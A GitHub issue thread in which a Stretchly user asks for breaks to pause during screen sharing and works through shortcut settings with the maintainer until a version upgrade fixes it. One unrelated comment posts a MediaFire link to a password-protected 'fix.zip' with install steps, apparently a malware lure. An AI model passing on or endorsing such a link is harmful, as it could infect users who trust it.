### ISSUE TITLE
[Feature request]: Pause when sharing screen

### ISSUE THREAD

**Issue by dkaszews** [hovancik/stretchly#1479]
### Version

- [X] I'm using version 1.15.1

### Existing requests

- [X] I've checked Existing requests

### Advanced Preferences

- [X] I've checked Advanced Preferences

### What operating system are you using?

Windows

### Operating System Version

Version 22H2 (OS Build 19045.4651)

### Problem description

The breaks interupt my work when sharing my screen, leading to additional confusion as my coworkers think the popup is on their side. Since I have enabled break enforcement, I just have to wait for the screen to disappear, then pause breaks manually and reenable them after the screenshare session ends. I do not want to decrease break time or enforcement just for those rare cases. I was unable to find an exclusion rule that works, as Teams does not spawn any additional process for screensharing.

### Possible solution

Detect (how?) that screen is being shared and optionally pause breaks.

### Alternative solutions

* Add option to pause breaks if microphone is in use (related to https://github.com/hovancik/stretchly/issues/969)
* Add an option or shortcut to pause (not skip) breaks, even if a break is currently running. This is currently not possible using fullscreen breaks, as they block mouse access to system tray.

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by hovancik** [comment]
Hi, I have never seen any way how to detect fullscreen apps with nodeJS, so I don't think it's possible. 

You can setup shortcuts to pause breaks.

**Comment by dkaszews** [comment]
Thank you for your response. I have not noticed those additional shortcut settings, they seem like a good solution to my problem, but I cannot get them to work. I have tried all of the following:

```json
"pauseBreaksFor30MinutesShortcut": "Super+Shift+Z",
"pauseBreaksFor30MinutesShortcut": "Meta+Shift+Z",
"pauseBreaksFor30MinutesShortcut": "CmdOrCtrl+Shift+Z",
"pauseBreaksFor30MinutesShortcut": "CmdOrCtrl+Z",
"pauseBreaksFor30MinutesShortcut": "Super+Shift+Q",
"pauseBreaksFor30MinutesShortcut": "Meta+Shift+Q",
"pauseBreaksFor30MinutesShortcut": "CmdOrCtrl+Shift+Q",
"pauseBreaksFor30MinutesShortcut": "CmdOrCtrl+Q",
```

I have also tried using the same values with `"skipToNextMiniBreakShortcut"` and `"pauseBreaksToggleShortcut"`, none ever triggered. I know that the config is being updated, because saving with a JSON syntax error immediately crashes the app.

**Comment by hovancik** [comment]
Hi, did you shut down stretchly before editing and then start it up again after?

**Comment by dkaszews** [comment]
I have now done the following:
1. Shut down stretchly
2. Edit config
3. Reopen stretchly

`"pauseBreaksToggleShortcut": "Super+Shift+Z"` works now, but `pauseBreaksFor(Time)Shortcut` do not. The `skipToNext(Scheduled|Mini|Long)Break` shortcuts also work, so only the timed pauses shortcuts seem to be broken.

This pretty much seems to resolve my issue, as toggling a pause ends any break that is currently running. It would be nice to get the timed versions working, so I don't forget to reenable it afterwards.

**Comment by hovancik** [comment]
Can you please try `time` with value from something that works? It is possible that not-working-shortcut is taken by some other app.

**Comment by dkaszews** [comment]
Yeah, I tried it with the same value as the toggle:

```json
"pauseBreaksToggleShortcut": "Super+Shift+Z"
"pauseBreaksFor30MinutesShortcut": "Super+Shift+Z"
"pauseBreaksFor1HourShortcut": "Super+Shift+Z"
"pauseBreaksFor2HoursShortcut": "Super+Shift+Z"
"pauseBreaksFor5HoursShortcut": "Super+Shift+Z"
"pauseBreaksUntilMorningShortcut": "Super+Shift+Z"
```

I checked each one at a time, the toggle works, all others don't. I have also grepped the repo to see those are the exact names used in https://github.com/hovancik/stretchly/blob/9d05ab403498b3987042ab93ffe7272e9dc5c6da/app/main.js#L1273 , there is no typo in documentation.

**Comment by hovancik** [comment]
Hi, I see. 

So how does your config looks like? 

I am trying `"pauseBreaksFor30MinutesShortcut": "Super+Shift+Z",` and it works fine (on Win 11). 

Just to be sure: each shortcut config name needs to be in config file only once, and the same goes for the actual shortcuts.

**Comment by dkaszews** [comment]
There are no duplicates between keys or values. You can take a look at the gists, they only differ on lines 481 and 490:

* Working `pauseBreaksToggleShortcut` - https://gist.github.com/dkaszews/6b046b5e42838d397d3c6af32dc60d63
* Not working `pauseBreaksFor30MinutesShortcut` - https://gist.github.com/dkaszews/4ceb2c400ca6d7f392bd84cc53297feb

**Comment by hovancik** [comment]
Ah, I think I see the issue :) You seems to be on version 1.15 and these shortcuts were added in version 1.16

**Comment by dkaszews** [comment]
Damn, you are right. I even looked at README blame to see when those shortcuts were added, but somehow came to conclusion it was over a year ago. Plus lack of 1.16 on WinGet and in issue template made me think the 1.15.1 was the newest.

I updated and everything works now! My only request would be to maybe allow the use of timed shortcut to resume breaks, as it currently just resets the break duration. Something like a `"pauseBreaksTimedShortcutBehavior" : "reset/toggle"` would be perfect.

**Comment by hovancik** [comment]
Glad that worked :) 

Currently Stretchly is pretty dumb and doesn't remember state, so every pause/resume is reset. #1248

**Comment by dkaszews** [comment]
I'm a bit confused, how can it not know the state? You can see the remaining pause time in tray and the toggle clearly works. If you mean that it doesn't remember how many short breaks elapsed before pausing, so it goes back to max, that's fine by me. 

What I wanted is so that if you press a 30 minute (or any longer) pause shortcut while the breaks are already paused, it should be configurable whether:

* it sets pause time back to 30 minutes (current behavior)
* it resumes the breaks (new configurable behavior)

**Comment by hovancik** [comment]
what I mean is that there is no real "pause" in Stretchly, it is always "stop doing breaks and then start from zero".

**Comment by dkaszews** [comment]
Understood 🙂 . Closing the issue then, thank you for all help and an awesome app!
